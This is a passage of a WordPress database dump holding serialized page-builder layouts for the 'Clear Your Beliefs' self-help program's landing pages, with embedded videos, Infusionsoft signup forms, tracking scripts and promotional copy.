(1276, 1740, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:240:"<img class="size-full wp-image-1457 aligncenter  img-responsive" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="577" height="140" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:507:"<center style="margin-top: -100px;"><div class="video-shadow" style="background-image: url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); background-repeat: no-repeat; background-size: contain; height: 288px; margin-top: 55px; padding-top: 75px; width: 600px;">\n<iframe src="//player.vimeo.com/video/109282065?autoplay=1" width="560" height="315" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -74px;"></iframe></iframe></div></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:573:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-top: -25px; margin-bottom: -30px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p style="text-align: center; padding-top: 10px; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\n<div style="margin-left: -15px; margin-bottom: 0px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/54657fac17ff5d88bb7ea5db95ab4742"></script></div>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:873:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style=" margin-top: -32px; margin-bottom: -27px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<div style="margin-left: -12px; margin-bottom: -25px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/95b50364c9028abe58d1cf438ba1ed6c"></script></div>\n\n\n<div style="margin-left: -12px; margin-bottom: -48px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/4d653090e9a0295e74e12ab5dff702ae"></script></div>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:659:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -25px; width: 118%; margin-left: -21px;"><img style="margin-top: -20px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x134.png"></div>\n<p style="text-align: center; margin-top: 18px; font-size: 16px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/af866427c80f3c42fbfe2df24442de38"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2813:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li> <em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1357, 1804, 'panels_data', 'a:3:{s:7:"widgets";a:6:{i:0;a:6:{s:3:"url";s:127:"http://pdl.vimeocdn.com/16811/544/307601254.mp4?token2=1416450601_9d98a208a80cfdef258e7d4117c15622&aksessionid=e225207db7d39688";s:6:"poster";s:0:"";s:4:"skin";s:10:"siteorigin";s:5:"ratio";s:5:"1.777";s:8:"autoplay";s:1:"0";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Video";}}i:1;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1498:"<p>[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]</p><center style="margin-bottom: -30px; margin-top: 15px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center><p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p><form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><p><input name="inf_form_name" type="hidden" value="Sign up for free  Clear Your Beliefs eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /></p><div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label><br /> <input id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" required="" type="text" /></div><div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label><br /> <input id="inf_field_Email" class="form-input" name="inf_field_Email" required="" type="text" /></div><div class="form-input-container-button"><input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div></form><p><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script><br /> [/su_box]</p>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2157:"<p>[su_box title="Free App" box_color="#1a2d8c" radius="8"]</p><center style="margin-bottom: -27px; margin-top: 15px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center><p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p><p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p><form class="infusion-form nd-form-1" style="position: relative; top: 10px ! important;" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><p><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click  Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /></p><div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" /></div></form><p><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script></p><form class="infusion-form nd-form-1" style="position: relative; bottom: -2px ! important;" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" method="POST"><input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" /><input name="inf_form_name" type="hidden" value="Click  Download iPAD APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /> <br /><div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" /></div><p> </p></form><p><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script><br /> [/su_box]</p>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1207:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; width: 100%;"><img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 51px; font-size: 16px;"><big><strong>Clear Your Limiting and Negative Beliefs</strong></big> – <big><strong>Permanently!</strong></big></p><form class="infusion-form rd-form-1" style="position: relative; bottom: -50px;" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit &quot;Learn More&quot;" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"2";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1394:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;"><h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2><p>[su_row][su_column size="1/2"]</p><ul style="margin-left: 25px;"><li>Release pain and hurts from the past</li><li>Open to deeper, more profound love</li><li>Recognize your true spiritual nature</li><li>Become more calm and less reactive</li><li>Rediscover the source of your personal power</li></ul><p>[/su_column][su_column size="1/2"]</p><ul><li>Clear whatever stops you from taking action</li><li>Open yourself to new possibilities of success</li><li>Eliminate blocks and barriers easily</li><li>Discover your true purpose</li><li>Express your true magnificence</li></ul><p>[/su_column][/su_row]</p><h2>How and Why It Works So Well</h2><ul style="margin-left: 26px;"><li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li><li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li><li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li><li>You''re in charge – you decide what you want to believe, and how far you want to go.</li><li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li><li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li></ul></div>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2845:"<div id="divStroke"><h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2><p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p><ul style="margin-left: 25px;"><li><em>What do I want to experience?</em></li><li><em>What belief is creating this experience I don''t want?</em></li><li><em>How can I change my belief so I can change my experience?</em></li></ul><p><strong>This is the most effective belief-change method that we know of.</strong> Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program. I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback. I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:4:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:6:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}}}'),
(1283, 1743, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:115:"<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:292:"<center>\n<div class="video-shadow">\n<div class="embed-responsive embed-responsive-16by9">\n<iframe src="//player.vimeo.com/video/109282065?autoplay=1" width="560" height="315" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen></iframe></iframe>\n</div>\n</div>\n</center>\n\n";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:573:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-top: -25px; margin-bottom: -30px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p style="text-align: center; padding-top: 10px; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\n<div style="margin-left: -15px; margin-bottom: 0px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/54657fac17ff5d88bb7ea5db95ab4742"></script></div>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:873:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style=" margin-top: -32px; margin-bottom: -27px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<div style="margin-left: -12px; margin-bottom: -25px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/95b50364c9028abe58d1cf438ba1ed6c"></script></div>\n\n\n<div style="margin-left: -12px; margin-bottom: -48px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/4d653090e9a0295e74e12ab5dff702ae"></script></div>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:611:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]<div style="height: auto; width: 100%;"><img style="top:-10px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x134.png"></div>\n<p style="text-align: center; margin-top: 18px; font-size: 16px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/af866427c80f3c42fbfe2df24442de38"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2813:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li> <em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion 